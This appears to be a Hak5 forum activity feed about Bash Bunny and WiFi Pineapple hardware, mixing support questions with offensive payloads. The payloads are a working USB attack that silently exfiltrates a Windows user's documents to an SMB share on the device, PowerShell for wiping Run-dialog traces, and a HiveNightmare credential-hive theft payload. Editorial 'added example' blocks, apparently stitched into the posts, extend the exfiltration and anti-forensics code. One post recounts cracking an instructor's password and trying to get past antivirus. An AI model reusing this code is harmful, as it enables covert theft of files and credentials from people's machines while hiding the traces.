All Activity

  1. Past hour
  2. When the bunny is connected in arming mode, can you see the drive with "lsblk" or "fdisk -l"? What firmware version are you running?
  3. I haven't tried this, but I guess it could work on some routers at least? I'll give it a go once my new lab equipment arrives and I get it up and running again.
  4. Today
  5. Is there a glossary of commands for script writing? Thanks.
  6. Which Hak5 product is best for accessing a Mac computer running El Capitan? Specifically, I'm trying to access the Messages app on the Mac.
  7. Yesterday
  8. Hey @Darren Kitchen It is wonderful to see you are still highly active in the forums and everywhere within Hak5. I highly respect your character, attitude, personality, and intellect and how much you have accomplished in the pen-testing / cybersecurity world. Plus, your show is fantastic as well. Overall I have become a fanboy of Hak5, haha. So, first off, I should test this at home when I have the time, but hopefully, you can just possibly answer my question before I even get home. I have my BB Mark II plugged into my Kali Linux virtual machine on my work laptop in arming mode, and the interface seems to not detect it. Neither does it if I put it in Switch 1 or 2 with payloads using Ethernet/Mass Storage. Here is a link to an image of me attempting this on my lunch right now: https://imgur.com/gallery/3WifEOM Also, I have been given permission and authorization to test payloads on our machines at work. So, I have been looking out for new payloads, pull requests, and more on these forums, as well as payloads that work or ones that are obsolete since I have full access to Windows 10, Mac, Linux PCs, laptops, and all sorts of hardware and network switches, etc. As long as I do not leave the campus with sensitive data, I am fine. Anyway, I am using my Kali Linux VMware Workstation Pro 16 to arm payloads, write my own, use the BB Manager, and everything else with the Bash Bunny Mark II since I am mainly on Kali Linux anyway. Windows 10 loves to mark everything as a virus, and it is much easier to just use it in Linux for arming mode. I need to learn more about PowerShell and more so I can write some payloads that would be a great asset to the Hak5 community. I believe in everyone here as they all seem to be white hat pentesters and work hard to make this device and the rest so much better. 
I am a Frontend Web Designer & Developer but looking to get my OSCP certification and learn penetration testing in the meantime over these past 10 months or so, but I am still new to it after nearly a year. Especially the password cracking, but I eventually figured it out in time to image all the computers in that cybersecurity classroom and move on to the next assignment for our IT Department, and the instructor is still unreachable. I managed to dump the credentials of our AC1-145 classroom at CCC, where I work in the Web Design/Marketing and IT Departments at my College. As much as I love designing web pages and web applications in Vue, React, and the triad of standards, I am just too passionate about pentesting and the Linux environment to ever give up on learning it. I hope to be a great asset to cybersecurity and the Hak5 forums and GitHub repositories, etc. We needed to get the onboard NIC password and eventually the instructor's station, since he is on vacation until the campus is back open. We have been unsuccessful in contacting him still. Still, because I had the Bash Bunny Mark II, over 60 computers and students will have their computers ready to use next week for their cybersecurity courses. So, thank you for everything you have done in the cybersecurity community and world. I was able to get the password from the students' computers (Dell OptiPlex), which I had never attempted before, but I got it. Then, I was able to get the hash string and use Hashcat to get the instructor's password. Not only was it a wonderful and exciting learning experience, but I also was paid to do it since I was on the clock working that day. I hope to be helpful to Hak5, our community, and the cybersecurity community in general, to make the online world safer as I learn more, but I need to get past some of these beginner hurdles first.
My main questions are more than likely quite simple ones, but I am still learning the Bash Bunny Mark II, Ducky language, Bash/shell payloads, Python (I still find Vue/React easier somehow), and overall the Linux pentesting tools. I still struggle to find the correct listening port for Metasploit payloads and exploits and other simple pentesting tools, but overall I am here to learn and help eventually. I am going to finish my lunch and get back to work. Hopefully, I can figure out how to set up Internet connection sharing with the BB on Windows and Linux, keep testing older payloads and newer ones, write new ones, and help others that are contributing to the more recent payloads. I have found many of the payloads that I want to get working again to not work, especially Browser Data and the credential ones. I noticed simple Sophos pre-installed antivirus software from our college protecting our machines from the BB, but I am trying to find ways around it, especially after finals are over this week. I also have a YouTube channel I used to do gaming on, but I might do some videos on the Bash Bunny Mark II once I learn it more, maybe a setup video? Still thinking about it all and learning it all, though. https://www.youtube.com/c/ShadowGaming99
  9. What formatting process are you using?
  10. Yes, I believe I ordered the wrong one from Amazon 😞 I can select the wlan3 interface for recon, but PineAP does not start, so it's not working. I will get the proper supported adaptor.
  11. As of now, most payloads simply remove the entire RunMRU history. This, however, may be noticed by a user that regularly uses the Run dialog. Instead, removing just the last entry can be done like so:

    #Remove latest run entry
    $p="HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU";$m="MRUList";$l=(gp $p).$m;rp $p $l[0];sp $p $m $l.SubString(1);

    Let's break it down:
    First we grab the list of all entries in RunMRU's MRUList: $l=(gp $p).$m
    After this we remove the last entry by its key: rp $p $l[0]
    Finally we update the MRUList to omit the removed key: sp $p $m $l.SubString(1)

    gp -> Get-ItemProperty
    rp -> Remove-ItemProperty
    sp -> Set-ItemProperty

    I hope this can be useful to some of you. ~9o3

    P.S. I shortened the snippet as much as possible; however, it's still a good idea to include this in a second stage if possible.
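    The one-liner above assumes MRUList exists and is non-empty, and it can only drop the newest slot. The following is an added example (not 9o3's code) that does the same cleanup defensively and, as an extension, can remove the entry whose stored command matches a pattern (for instance the exact command a payload typed) while leaving the rest of the user's history and ordering intact. It assumes the documented RunMRU layout: one value per slot named "a".."z" and an MRUList string holding the slot letters, most recent first. The function name Remove-RunMruEntry is the example's own.

```powershell
# Added example: remove one RunMRU entry, either the newest or the one whose
# command matches -Pattern, and rewrite MRUList so the remaining order is kept.
# Assumes the standard RunMRU layout (slots "a".."z", MRUList = order string).
function Remove-RunMruEntry {
    [CmdletBinding()]
    param(
        # Regex matched against the stored command; omit to remove the newest entry.
        [string]$Pattern
    )
    $path = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $path)) { return $false }          # nothing to clean
    $props = Get-ItemProperty -Path $path
    $order = [string]$props.MRUList
    if ([string]::IsNullOrEmpty($order)) { return $false } # empty history

    # Decide which slot letter to drop. The newest is the first char of MRUList.
    $slot = $null
    if ($Pattern) {
        foreach ($c in $order.ToCharArray()) {
            $name  = [string]$c
            $value = [string]$props.$name                   # stored as "cmd\1"
            if ($value -match $Pattern) { $slot = $name; break }
        }
    } else {
        $slot = $order.Substring(0, 1)
    }
    if (-not $slot) { return $false }                      # no match, touch nothing

    Remove-ItemProperty -Path $path -Name $slot -ErrorAction SilentlyContinue
    # Rebuild the order string without the removed slot; an empty MRUList is
    # what a freshly created RunMRU key looks like, so it is not suspicious.
    Set-ItemProperty -Path $path -Name 'MRUList' -Value $order.Replace($slot, '')
    return $true
}

# Usage from a second stage: drop only the entry the payload itself typed.
Remove-RunMruEntry -Pattern 'powershell.*-exec bypass'
```

    Matching on the command text rather than on position matters if the user opened the Run dialog between the HID stage and the cleanup stage; blindly removing the first slot would then delete their entry and leave yours in place.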
  12. Then it's not an ACM but an AC. I would suggest getting one with a supported/preferred chipset (such as the ACM).
  13. OK, my bad. This adaptor uses a different chipset (Realtek 8812AU/8821A). I installed the firmware and driver from the packages in the UI, and now I have wlan3. Thanks!
  14. Bus 001 Device 004: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
    Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 001 Device 003: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
    Bus 001 Device 007: ID 0bda:0811 Realtek Semiconductor Corp.
    Bus 001 Device 002: ID 1a40:0101 Terminus Technology Inc. Hub
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

    Sorry, it's the Alfa AWUS036ACS, not ACM.
  15. No drivers should be needed. What's the output of lsusb? Is the ACM listed when it's attached?
  16. Hi all. I just got the AWUS036ACM, but it does not show up on my Pineapple Mk7. Can anyone tell me the procedure to load the drivers / firmware? I am on 1.1.0 Beta 2. Thanks in advance.
  17. No worries, good sir, it's all my pleasure; I enjoyed your code (it was handsome), so I wanted to include it in this thread as well! It's good to have different versions and approaches; that's how we improve! 🙂 (The exe can run in cmd in case PS is blocked, as an example.) Your code taught me a lot, so keep up the good stuff! Same to you!
  18. Hi Hitem, First off awesome that you also made a BB payload for the SeriousSAM vulnerability! If I had known you were also working on it I wouldn't have submitted my own payload. My apologies for that. I look forward to seeing what other payloads you'll create. ~9o3
  19. chrizree

    1.74 GB?

    As I said in the other post, is udisk mounted? Doesn't seem like that, which is correct behavior for the Mk2. Quoting the Docs: "By default in all switch positions the udisk is not mounted on the host (the Bash Bunny itself)." "The /root/udisk directory will appear blank unless `udisk mount` has been executed." It's all explained in the Docs https://docs.hak5.org/hc/en-us/articles/4402980129179-Bash-Bunny-Mark-II-Considerations
  20. GUHEVA

    1.74 GB?

    Hi everyone, I recently got my Bash Bunny MKII from Amazon (store fonefunshop), and I noticed that the capacity for this is 1.74 GB (arming mode). Is that all the capacity for my BB? I know there is a slot for the SD card, but what happens if I do not have an SD card and I want to run some payloads to copy some files? I think there is not enough space with just the BB, and I saw some comments about it supposedly having 8 GB.

    Filesystem  Size  Used  Avail  Use%  Mounted on
    /dev/root   3.2G  1.6G  1.5G   53%   /
    devtmpfs    352M  0     352M   0%    /dev
    tmpfs       502M  0     502M   0%    /dev/shm
    tmpfs       502M  13M   489M   3%    /run
    tmpfs       5.0M  0     5.0M   0%    /run/lock
    tmpfs       502M  0     502M   0%    /sys/fs/cgroup

    I hope you can help me. Regards.
  21. Jtyle6

    1.74 GB?

    Post in the right area of the forum... https://forums.hak5.org/forum/92-bash-bunny/
  22. GUHEVA

    1.74 GB?

    This is what it shows.

    Filesystem  Size  Used  Avail  Use%  Mounted on
    /dev/root   3.2G  1.6G  1.5G   53%   /
    devtmpfs    352M  0     352M   0%    /dev
    tmpfs       502M  0     502M   0%    /dev/shm
    tmpfs       502M  13M   489M   3%    /run
    tmpfs       5.0M  0     5.0M   0%    /run/lock
    tmpfs       502M  0     502M   0%    /sys/fs/cgroup

    How can I mount the udisk? I hope you can help me. Regards.
  23. Last week
  24. Hi guys! I just wanted to add that I did a PR to GitHub, and a few hours after me this gentleman did a *.exe-less version. I'm posting it here in case someone is interested! 🙂 The only reason for me to actually keep the *.exe in mine is purely to give credit where credit was due. Now you have both! Enjoy!
  25. Now you can involuntarily back up more of the target's data by writing to the microSD card instead of the internal storage.

    Prerequisite: SSH or serial into your Bunny MK2 and do the following:

    'timedatectl set-time' followed by the current year, month and date.

    Run:
    'apt update ; apt install gcc'
    'cd /tools'
    'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz'
    'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/'
    'rm -f impacket-0.9.19.tar.gz'
    'cd impacket'
    'pip install -r requirements.txt'
    'cd ../'
    'mkdir tmp'
    'cd tmp'
    'pip2 install setuptools-rust'
    'pip2 install cryptography'
    'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg'
    'rm -f pyasn1-0.4.8-py2.7.egg'
    'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz'
    'tar -xzvf pycryptodomex-3.10.1.tar.gz'
    'cd pycryptodomex-3.10.1 && python setup.py install'
    'cd /tools/'
    'rm -rf tmp/'
    'cd impacket/ && python setup.py install'

    Now on your microSD card, create the following directory structure:

    /smb
    |___loot/
    |___s.ps1

    Copy the following payload.txt into either switch 1 or switch 2:

    ######## INITIALIZATION ########
    REQUIRETOOL impacket
    GET SWITCH_POSITION
    # Mount SD as udisk
    udisk mount

    ######## ETHERNET STAGE ########
    LED STAGE1
    ATTACKMODE RNDIS_ETHERNET
    # Start the SMB Server
    python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log &

    ######## HID STAGE ########
    # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
    GET HOST_IP
    LED STAGE2
    ATTACKMODE HID RNDIS_ETHERNET
    RUN WIN powershell
    Q DELAY 1000
    Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
    Q DELAY 500
    Q ENTER
    LED SPECIAL
    # Wait until files are done copying
    while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

    ######## CLEANUP ########
    LED CLEANUP
    # Delete EXFILTRATION_COMPLETE file
    rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE
    # Sync file system
    sync
    # Unmount the SD card
    udisk unmount

    ######## FINISH ########
    # Trap is clean
    sync
    LED FINISH
    shutdown 0

    Finally, here is the s.ps1:

    $exfil_dir="$Env:UserProfile\Documents"
    $exfil_ext="*.docx"
    $exfil_ext1="*.pdf"
    $exfil_ext2="*.xlsx"
    $loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
    mkdir $loot_dir
    robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
    New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
    Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

    Now, eject the microSD card, insert it into your Bunny MK2, move the switch to the one where the payload.txt is placed, and insert it into a Windows 10 machine. If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂
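    One failure mode in the payload above: the Bunny loops forever on EXFILTRATION_COMPLETE, but s.ps1 only writes that marker if mkdir and robocopy both get that far, so a locked source folder or an unreachable share leaves the device stuck on LED SPECIAL. The following is an added example (not the poster's s.ps1) of the same collection step with that handled: the marker is always written in a finally block and carries a status, and robocopy's exit code (8 and above means at least one failure) is checked rather than ignored. It assumes the share is still \\172.16.64.1\s (the Bunny's default RNDIS address used in the post) and that the share root is writable.

```powershell
# Added example: collection stage that always signals completion back to the
# Bunny, so the payload's wait loop can never hang on a failed copy.
# Assumes the SMB share \\172.16.64.1\s from the post, writable at its root.
$share    = '\\172.16.64.1\s'
$src      = "$Env:UserProfile\Documents"
$patterns = @('*.docx', '*.pdf', '*.xlsx')
$stamp    = (Get-Date).ToString('yyyy-MM-dd_HHmmss')   # 24h clock, no AM/PM collisions
$loot     = Join-Path $share "loot\$Env:ComputerName\$stamp"
$status   = 'UNKNOWN'

try {
    New-Item -ItemType Directory -Path $loot -Force | Out-Null
    # /R:1 /W:1 stops robocopy from retrying locked files for minutes,
    # /XJ skips junctions so we do not recurse into reparse-point loops,
    # /NP /NFL /NDL keep the output small (it goes nowhere anyway).
    robocopy $src $loot $patterns /S /MT:8 /Z /R:1 /W:1 /XJ /NP /NFL /NDL | Out-Null
    # robocopy exit codes 0-7 are success variants; 8 and above mean failures.
    if ($LASTEXITCODE -ge 8) {
        $status = "ROBOCOPY_FAILED_$LASTEXITCODE"
    } else {
        $status = "OK_$LASTEXITCODE"
    }
} catch {
    $status = "ERROR: $($_.Exception.Message)"
} finally {
    # The Bunny polls for this file; write it on every path so the device
    # proceeds to CLEANUP instead of sitting on LED SPECIAL indefinitely.
    Set-Content -Path (Join-Path $share 'EXFILTRATION_COMPLETE') -Value $status
}
```

    The status text lands in the marker file on the microSD card, so after the run you can tell a clean copy from a partial one without attaching a console to the Bunny.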
  26. Hi, I'm 9o3. I am a Solution Architect, Bug bounty hunter, programmer, and most of all a cyber security enthusiast. I love finding edge cases and finding ways to make machines do things they aren't supposed to. I look forward to getting to know all of you 🙂
  27. HiveNightmare for Bash Bunny
    Author: hitem
    Version: 1.0

    Description
    Leverages the following exploit: CVE-2021-36934, dubbed "SeriousSAM". It uses a PoC tool by GossiTheDog.
    Targets Windows 10. Deploys in roughly 8-10 sec from plug-in to execution completed.
    Now you have SAM, SYSTEM and SECURITY in your loot folder! It clears some basic traces! (run/folder)

    Requirements
    Bash Bunny \o/

    STATUS LED       STATUS
    Purple           Initializing
    Blue (blinking)  Installing and running scripts
    Green            Finished

    Installation and Execution
    Plug in the Bash Bunny in arming mode.
    Move the files to the switch you want them to be executed from (don't forget the *.exe from GossiTheDog's repository).
    Edit the scripts to fit your deployment (the *.ps1 switch path, as an example).
    Eject the Bash Bunny and go ahead!

    The only known mitigation in my limited testing is "folder protection" turned on by Windows Defender. I have also attached the /Mitigation/ possibility in the repository below for those who want to remedy this exploit via Bash Bunny.

    Download
    Click here to go to my GitHub and download.

    Note and Creds: I have owned a Bash Bunny MKII for 1 week; I'm completely new to this. SeriousSAM, however, is a "get it while it's fresh" exploit, and I wrote a simple Bash Bunny script and a PowerShell script to leverage GossiTheDog's PoC tool. More info in the scripts!
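    Whether the payload above gets anything depends on two things the description does not check: the hive files must carry the over-permissive ACL (BUILTIN\Users with read access), and a volume shadow copy that preserved that ACL must exist, because the live hives are held open by the kernel. The following is an added example (not hitem's or GossiTheDog's code) of a pre-flight check for both conditions that runs without admin rights, usable as a stage before the PoC or by a defender verifying the mitigation. It assumes shadow copies appear under \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN, which is the device path the public PoCs read from; the function name Test-HiveNightmare and the probe limit of 15 shadow copies are the example's own choices.

```powershell
# Added example: check whether this host is exposed to CVE-2021-36934 from an
# unprivileged context. Assumes the HarddiskVolumeShadowCopyN device naming
# used by the public PoCs; probes copies 1..15 (an arbitrary upper bound).
function Test-HiveNightmare {
    $names  = 'SAM', 'SYSTEM', 'SECURITY'
    $result = [ordered]@{ WeakAcl = @(); ReadableShadowHives = @() }

    # Condition 1: BUILTIN\Users granted read on the live hive files.
    foreach ($name in $names) {
        $hive = "$Env:windir\System32\config\$name"
        try {
            $acl = Get-Acl -Path $hive -ErrorAction Stop
        } catch {
            # A correctly secured hive denies even READ_CONTROL to standard users.
            continue
        }
        $users = $acl.Access | Where-Object {
            $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
            $_.AccessControlType -eq 'Allow' -and
            (($_.FileSystemRights -band
              [System.Security.AccessControl.FileSystemRights]::ReadData) -ne 0)
        }
        if ($users) { $result.WeakAcl += $hive }
    }

    # Condition 2: a shadow copy from which the hive can actually be opened.
    foreach ($n in 1..15) {
        foreach ($name in $names) {
            $p = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$n\Windows\System32\config\$name"
            try {
                $fs = [System.IO.File]::Open($p, 'Open', 'Read', 'ReadWrite')
                $fs.Close()
                $result.ReadableShadowHives += $p
            } catch {
                # Missing shadow copy or access denied: not readable, move on.
            }
        }
    }
    [pscustomobject]$result
}

$r = Test-HiveNightmare
if ($r.ReadableShadowHives.Count -gt 0) {
    "VULNERABLE: hives readable from shadow copy:`n" + ($r.ReadableShadowHives -join "`n")
} elseif ($r.WeakAcl.Count -gt 0) {
    "ACL is weak but no shadow copy exposes the hives yet (live files are locked by the kernel)."
} else {
    "Not exposed."
}
```

    The second branch is the case a payload should still care about: restoring inheritance on the config directory fixes the ACL going forward, but any shadow copy taken while the ACL was weak keeps a readable copy until the shadow copies themselves are deleted, which is why the vendor mitigation does both.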